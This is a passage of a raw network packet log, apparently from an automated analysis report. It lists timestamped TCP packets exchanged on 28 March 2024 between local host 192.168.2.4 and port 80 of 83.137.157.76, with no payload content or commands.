                                                          Mar 28, 2024 08:02:00.087220907 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087259054 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087354898 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087368965 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087380886 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087392092 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087410927 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087426901 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087454081 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087466002 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087498903 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087548018 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087579012 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087625027 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087641001 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087683916 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087760925 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087816000 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087836981 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087879896 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087887049 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087929964 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087944031 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087987900 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088020086 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088063955 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088076115 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088124037 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088128090 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088164091 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088268995 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088282108 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088294029 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088305950 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088313103 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088335991 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088345051 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088367939 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088392973 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088414907 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088447094 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088455915 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088486910 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088541031 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088579893 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088601112 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088643074 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088653088 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088696003 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088705063 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088747025 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088762045 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088804007 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088804960 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088819981 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088850021 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088861942 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088895082 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088943005 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088943958 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088984966 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088994980 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089045048 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089051962 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089066029 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089095116 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089096069 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089114904 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089119911 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089132071 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089142084 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089158058 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089175940 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089180946 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089220047 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.286565065 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286593914 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286657095 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286668062 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.286669970 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286709070 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.286772013 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286823034 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.286838055 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286890984 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.286904097 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286947966 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287039042 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287084103 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287163019 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287209988 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287220955 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287261963 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287350893 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287364006 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287375927 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287388086 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287400961 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287420988 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287427902 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287470102 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287478924 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287492037 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287513971 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287519932 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287539959 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287564993 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287566900 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287615061 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287627935 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287638903 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287652016 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287661076 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287678957 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287682056 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287724972 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287750959 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287755013 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287769079 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287796021 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287823915 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287847996 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287861109 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287873030 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287893057 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287919998 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287925005 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287975073 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.287978888 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.287991047 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288017035 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288022041 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288028002 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288059950 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288073063 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288084030 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288094997 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288110971 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288110971 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288117886 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288152933 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288172007 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288177967 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288184881 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288211107 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288239956 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288247108 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288260937 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288269043 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288286924 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288319111 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288321018 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288362026 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288368940 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288381100 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288419008 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288470030 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288515091 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288568020 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288614988 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288626909 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288652897 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288675070 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288702965 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288707018 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288760900 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288794041 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288845062 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288924932 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.288981915 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.288997889 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289043903 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289048910 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289089918 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289094925 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289139032 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289148092 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289170027 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289199114 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289207935 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289211988 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289221048 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289243937 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289257050 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289279938 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289285898 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289328098 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289335966 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289349079 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289355993 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289393902 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289405107 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289417982 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289429903 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289431095 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289442062 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289450884 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289465904 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289469957 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289478064 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289494991 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289529085 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289541960 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289542913 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289576054 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289601088 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289616108 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289619923 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289629936 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289642096 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289654016 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.289663076 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.289690018 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.485928059 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.485984087 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.485997915 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486000061 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486021996 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486033916 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486057997 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486071110 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486083984 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486092091 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486099005 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486112118 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486113071 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486125946 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486145020 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486180067 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486192942 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486205101 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486217976 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486219883 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486243963 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486254930 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486269951 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486294031 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486296892 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486310005 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486324072 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486336946 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486336946 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486354113 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486371040 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486387968 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486391068 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486402988 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486423969 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486428976 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486443043 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486447096 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486455917 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486466885 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486469030 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486486912 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486509085 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486516953 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486534119 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486572027 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486599922 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486640930 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486673117 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486727953 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486742973 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486769915 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486792088 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486800909 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486805916 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486836910 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486869097 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486916065 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486931086 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.486974955 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.486996889 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487041950 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487042904 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487057924 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487091064 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487109900 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487112999 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487152100 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487185955 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487234116 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487235069 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487279892 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487286091 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487329960 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487340927 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487390041 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487394094 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487440109 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487448931 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487493992 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487505913 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487529993 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487555027 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487566948 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487576008 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487621069 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487694979 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487730980 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487740040 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487771988 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487813950 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487855911 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487889051 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487930059 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.487938881 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487972021 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.487993956 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488034964 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488059044 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488099098 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488102913 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488117933 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488143921 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488156080 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488188028 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488229036 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488243103 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488256931 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488270998 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488293886 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488312006 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488316059 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488329887 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488343000 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488356113 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488357067 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488379002 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488383055 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488408089 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488430023 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488437891 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488444090 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488456964 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488476992 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488492012 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488492966 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488508940 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488533974 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488540888 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488585949 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488605022 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488642931 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488657951 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.488697052 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.488718033 CET804973683.137.157.76192.168.2.4
